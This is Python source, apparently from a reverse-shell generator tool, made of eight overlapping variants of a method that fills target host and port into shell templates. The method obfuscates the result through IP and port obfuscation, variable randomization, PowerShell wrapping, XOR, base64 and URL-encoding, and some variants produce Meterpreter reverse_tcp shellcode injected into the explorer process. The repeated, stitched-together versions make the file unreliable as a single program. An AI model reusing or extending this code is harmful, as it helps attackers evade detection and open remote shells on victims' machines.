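def get(self):
    """
    Produce the finished code string for this shell and return it.

    The transformations run in a fixed order, each one overwriting
    ``self.code``: optional port obfuscation, ``PORT`` substitution,
    variable randomization, the PowerShell wrapper, an optional XOR layer,
    the base64 wrapper and finally optional URL-encoding. Layers nest in
    application order, so URL-encoding (when enabled) is the outermost one.

    The instance is mutated (``self.port`` and ``self.code``), so a second
    call starts from the already processed text, not the original template.
    """
    # Port obfuscation is opt-in; this variant rewrites only the port.
    if self.args.ipfuscate:
        self.port = obfuscate_port(self.port, self.args.obfuscate_small,
                                   self.lang)

    # Plain token substitution: every occurrence of "PORT" is replaced.
    self.code = self.code.replace("PORT", str(self.port))

    self.code = randomize_vars(self.code, self.args.obfuscate_small,
                               self.lang)

    # The wrapper receives the full args object; whether it changes the
    # code is decided inside it (not visible from here).
    self.code = powershell_wrapper(self.name, self.code, self.args)

    # Compare by value. The previous `is 0` relied on CPython's small-int
    # caching and is reported as a SyntaxWarning on Python 3.8+.
    if self.args.xor != 0:
        self.code = xor_wrapper(self.name, self.code, self.args)

    self.code = base64_wrapper(self.name, self.code, self.args)

    # Identity check kept on purpose: only a literal True enables this step.
    if self.args.urlencode is True:
        self.code = to_urlencode(self.code)

    return self.code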
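def get(self):
    """
    Produce the finished code string for this shell and return it.

    Templates that contain both ``TARGET`` and ``PORT`` get the connection
    data substituted, then pass through the PowerShell wrapper and the
    XOR / base64 / URL-encoding layers, in that order.

    Templates without those tokens are treated as custom shells. Only names
    containing "bloodseeker" are handled: they require ``--stager`` and are
    returned without any encoding layer. Any other custom shell, or a
    missing stager, prints an error and exits the process with status 1.
    """
    if "TARGET" in self.code and "PORT" in self.code:
        # Plain token substitution; every occurrence of either token is
        # replaced, not just the intended placeholders.
        with_host = str(self.code.replace("TARGET", self.host))
        self.code = with_host.replace("PORT", str(self.port))
        self.code = powershell_wrapper(self.name, self.code, self.args)
    elif "bloodseeker" in self.name.lower():
        # This custom shell cannot be produced without a stager.
        if self.args.stager is None:
            print(error("This payload REQUIRES --stager flag."))
            exit(1)
        print(info("Generating shellcode ..."))
        # NOTE(review): .decode("base64") is a Python 2-only codec call.
        # This branch reads self.args.host / self.args.port directly rather
        # than self.host / self.port.
        script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
            "SHELLCODEHERE",
            shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
                             self.args.host, self.args.port))
        # The process name is hard-coded in this version.
        self.code = script.replace("PROCESSNAME", "explorer")
        print(
            alert(
                "Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine."
            ))
        # Returned as-is: the encoding layers below are skipped here.
        return self.code
    else:
        print(
            error(
                "No custom shell procedure was arranged for this shell. This is fatal."
            ))
        exit(1)

    # Compare by value. The previous `is 0` relied on CPython's small-int
    # caching and is reported as a SyntaxWarning on Python 3.8+.
    if self.args.xor != 0:
        self.code = xor_wrapper(self.name, self.code, self.args)

    self.code = base64_wrapper(self.name, self.code, self.args)

    # URL-encoding is skipped whenever a stager was requested.
    if self.args.urlencode is True and self.args.stager is None:
        self.code = to_urlencode(self.code)

    return self.code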
def get(self):
    """
    Return the payload after the base64 wrapper and optional URL-encoding.

    ``self.payload`` is overwritten with each intermediate result, so the
    instance keeps the processed text after the call.
    """
    # First layer: always goes through the base64 wrapper.
    self.payload = base64_wrapper(self.name, self.payload, self.args)

    # Second layer: only a literal True enables URL-encoding.
    url_encoding_requested = self.args.urlencode is True
    if not url_encoding_requested:
        return self.payload

    self.payload = to_urlencode(self.payload)
    return self.payload
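def get(self):
    """
    Produce the finished code string for this shell and return it.

    Templates that contain both ``TARGET`` and ``PORT`` get the connection
    data substituted, then pass through the PowerShell wrapper and the
    XOR / base64 / URL-encoding layers, in that order.

    Templates without those tokens are treated as custom shells and are
    dispatched on ``self.name``: "bat2meterpreter" and "bloodseeker" are
    handled and returned without any encoding layer. Any other custom
    shell, or "bloodseeker" without ``--stager``, prints an error and
    exits the process with status 1.
    """
    if "TARGET" in self.code and "PORT" in self.code:
        # Plain token substitution; every occurrence of either token is
        # replaced, not just the intended placeholders.
        with_host = str(self.code.replace("TARGET", self.host))
        self.code = with_host.replace("PORT", str(self.port))
        self.code = powershell_wrapper(self.name, self.code, self.args)
    else:
        # Custom shells: each one has its own procedure.
        # TODO: I need to separate this into a custom file.
        # These branches read self.args.host / self.args.port directly
        # rather than self.host / self.port.
        shell_name = self.name.lower()

        if "bat2meterpreter" in shell_name:
            print(info("Generating shellcode ..."))
            # self.code is left untouched; the result is only returned.
            return self.code + shellcode_to_hex(
                "windows/meterpreter/reverse_tcp", self.args.host,
                self.args.port)

        if "bloodseeker" in shell_name:
            # This custom shell cannot be produced without a stager.
            if self.args.stager is None:
                print(error("This payload REQUIRES --stager flag."))
                exit(1)
            print(info("Generating shellcode ..."))
            # NOTE(review): .decode("base64") is a Python 2-only codec call.
            script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
                "SHELLCODEHERE",
                shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
                                 self.args.host, self.args.port))
            # TODO: Create a --bloodseeker-process flag to specify process name
            process_name = "explorer"
            self.code = script.replace("PROCESSNAME", process_name)
            # Adjacent literals replace the backslash continuation inside
            # the string, which appears to have pulled the next line's
            # indentation into the printed message.
            print(alert("Make sure you have a handler for "
                        "windows/x64/meterpreter/reverse_tcp listening "
                        "in your machine."))
            # Returned as-is: the encoding layers below are skipped here.
            return self.code

        print(error("No custom shell procedure was arranged for this shell. This is fatal."))
        exit(1)

    # Compare by value. The previous `is 0` relied on CPython's small-int
    # caching and is reported as a SyntaxWarning on Python 3.8+.
    if self.args.xor != 0:
        self.code = xor_wrapper(self.name, self.code, self.args)

    self.code = base64_wrapper(self.name, self.code, self.args)

    # URL-encoding is skipped whenever a stager was requested.
    if self.args.urlencode is True and self.args.stager is None:
        self.code = to_urlencode(self.code)

    return self.code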
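def get(self):
    """
    Produce the finished code string for this shell and return it.

    Order of operations: ``PORT`` substitution, optional XOR layer, base64
    wrapper, optional URL-encoding. Each step overwrites ``self.code``, so
    the instance keeps the processed text after the call.
    """
    # Plain token substitution: every occurrence of "PORT" is replaced.
    self.code = self.code.replace("PORT", str(self.port))

    # Compare by value. The previous `is 0` relied on CPython's small-int
    # caching and is reported as a SyntaxWarning on Python 3.8+.
    if self.args.xor != 0:
        self.code = xor_wrapper(self.name, self.code, self.args)

    self.code = base64_wrapper(self.name, self.code, self.args)

    # Identity check kept on purpose: only a literal True enables this step.
    if self.args.urlencode is True:
        self.code = to_urlencode(self.code)

    return self.code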
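def get(self):
    """
    Produce the finished code string for this shell and return it.

    Order of operations: ``PORT`` substitution, PowerShell wrapper,
    optional XOR layer, base64 wrapper, optional URL-encoding. Each step
    overwrites ``self.code``, so the instance keeps the processed text
    after the call.
    """
    # Plain token substitution: every occurrence of "PORT" is replaced.
    self.code = self.code.replace("PORT", str(self.port))

    # The wrapper receives the full args object; whether it changes the
    # code is decided inside it (not visible from here).
    self.code = powershell_wrapper(self.name, self.code, self.args)

    # Compare by value. The previous `is 0` relied on CPython's small-int
    # caching and is reported as a SyntaxWarning on Python 3.8+.
    if self.args.xor != 0:
        self.code = xor_wrapper(self.name, self.code, self.args)

    self.code = base64_wrapper(self.name, self.code, self.args)

    # Identity check kept on purpose: only a literal True enables this step.
    if self.args.urlencode is True:
        self.code = to_urlencode(self.code)

    return self.code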
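def get(self):
    """
    Produce the finished code string for this shell and return it.

    The template goes through ``PORT`` substitution, the PowerShell
    wrapper, an optional XOR layer, the base64 wrapper and optional
    URL-encoding, in that order. ``self.code`` is overwritten at every
    step, so a second call would start from the processed text.
    """
    # Plain token substitution: every occurrence of "PORT" is replaced.
    self.code = self.code.replace("PORT", str(self.port))

    # The wrapper receives the full args object; whether it changes the
    # code is decided inside it (not visible from here).
    self.code = powershell_wrapper(self.name, self.code, self.args)

    # Compare by value. The previous `is 0` relied on CPython's small-int
    # caching and is reported as a SyntaxWarning on Python 3.8+.
    xor_requested = self.args.xor != 0
    if xor_requested:
        self.code = xor_wrapper(self.name, self.code, self.args)

    self.code = base64_wrapper(self.name, self.code, self.args)

    # Identity check kept on purpose: only a literal True enables this step.
    if self.args.urlencode is True:
        self.code = to_urlencode(self.code)

    return self.code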
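def get(self):
    """
    Produce the finished code string for this shell and return it.

    Host and port obfuscation runs first when requested, except for
    PowerShell shells. Templates that contain both ``TARGET`` and ``PORT``
    then get the connection data substituted and pass through variable
    randomization, the PowerShell wrapper and the XOR / base64 /
    URL-encoding layers, in that order.

    Templates without those tokens are treated as custom shells and are
    dispatched on ``self.name``: "bat2meterpreter" and "bloodseeker" are
    handled and returned without any encoding layer. Any other custom
    shell, or "bloodseeker" without ``--stager``, prints an error and
    exits the process with status 1.
    """
    # Obfuscation is opt-in and skipped for PowerShell
    # (original note: Windows shells don't support ipfuscation).
    if self.args.ipfuscate and self.lang != "powershell":
        self.host = ipfuscate(self.host, self.args.obfuscate_small)
        self.port = obfuscate_port(self.port, self.args.obfuscate_small,
                                   self.lang)

    if "TARGET" in self.code and "PORT" in self.code:
        # Plain token substitution; every occurrence of either token is
        # replaced, not just the intended placeholders.
        with_host = str(self.code.replace("TARGET", self.host))
        self.code = with_host.replace("PORT", str(self.port))
        self.code = randomize_vars(self.code, self.args.obfuscate_small,
                                   self.lang)
        self.code = powershell_wrapper(self.name, self.code, self.args)
    else:
        # Custom shells: each one has its own procedure.
        # TODO: I need to separate this into a custom file.
        # These branches read self.args.host / self.args.port directly, so
        # the obfuscated self.host / self.port set above are not used here.
        shell_name = self.name.lower()

        if "bat2meterpreter" in shell_name:
            print(info("Generating shellcode ..."))
            # self.code is left untouched; the result is only returned.
            return self.code + shellcode_to_hex(
                "windows/meterpreter/reverse_tcp", self.args.host,
                self.args.port)

        if "bloodseeker" in shell_name:
            # This custom shell cannot be produced without a stager.
            if self.args.stager is None:
                print(error("This payload REQUIRES --stager flag."))
                exit(1)
            print(info("Generating shellcode ..."))
            # NOTE(review): .decode("base64") is a Python 2-only codec call.
            script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
                "SHELLCODEHERE",
                shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
                                 self.args.host, self.args.port))
            # TODO: Create a --bloodseeker-process flag to specify process name
            process_name = "explorer"
            self.code = script.replace("PROCESSNAME", process_name)
            # Adjacent literals replace the backslash continuation inside
            # the string, which appears to have pulled the next line's
            # indentation into the printed message.
            print(alert("Make sure you have a handler for "
                        "windows/x64/meterpreter/reverse_tcp listening "
                        "in your machine."))
            # Returned as-is: the encoding layers below are skipped here.
            return self.code

        print(
            error(
                "No custom shell procedure was arranged for this shell. This is fatal."
            ))
        exit(1)

    # Compare by value. The previous `is 0` relied on CPython's small-int
    # caching and is reported as a SyntaxWarning on Python 3.8+.
    if self.args.xor != 0:
        self.code = xor_wrapper(self.name, self.code, self.args)

    self.code = base64_wrapper(self.name, self.code, self.args)

    # URL-encoding is skipped whenever a stager was requested.
    if self.args.urlencode is True and self.args.stager is None:
        self.code = to_urlencode(self.code)

    return self.code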